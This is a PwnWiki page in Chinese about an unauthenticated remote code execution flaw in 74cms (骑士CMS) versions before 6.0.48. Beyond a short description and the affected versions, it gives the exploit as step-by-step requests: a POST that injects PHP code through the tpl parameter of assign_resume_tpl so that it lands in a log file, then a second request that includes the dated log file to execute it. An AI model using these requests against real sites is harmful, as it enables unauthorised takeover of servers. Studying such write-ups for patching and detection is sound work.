骑士CMS模板注入 &文件包含getshell漏洞

From PwnWiki
Revision as of 17:14, 5 July 2021 by Xc1ym (talk | contribs) (Created page with "骑士CMS人才系统,是一项基于PHP+MYSQL为核心开发的一套免费+开源专业人才网站系统。软件具执行效率高、模板自由切换、后台管理功...")
Other languages:
Chinese • ‎中文(中国大陆)‎ • ‎中文(台灣)‎

漏洞描述

骑士CMS人才系统,是一项基于PHP+MYSQL为核心开发的一套免费+开源专业人才网站系统。软件具执行效率高、模板自由切换、后台管理功能方便等诸多优秀特点。

騎士 CMS 官方發布安全更新,修復了一處遠程代碼執行漏洞。由於騎士 CMS 某些函數存在過濾不嚴格,攻擊者通過構造惡意請求,配合文件包含漏洞可在無需登錄的情況下執行任意代碼,控制服務器。

影響範圍

騎士 CMS < 6.0.48

漏洞利用

使用火狐hackbar發送POST: 

http://192.168.31.61/upload/index.php?m=home&a=assign_resume_tpl

variable=1&tpl=<?php phpinfo(); ob_flush();?>/r/n<qscms/company_show 列表名="info" 企业id="$_GET['id']"/>


可以看到日誌記錄。

包含這條日誌,注意路徑和日誌名稱: 

http://192.168.31.61/upload/index.php?m=home&a=assign_resume_tpl

variable=1&tpl=data/Runtime/Logs/Home/21_02_05.log
Retrieved from "https://pwnwiki.com/index.php?title=騎士CMS模版註入_%26文件包含getshell漏洞/zh-cn&oldid=6326"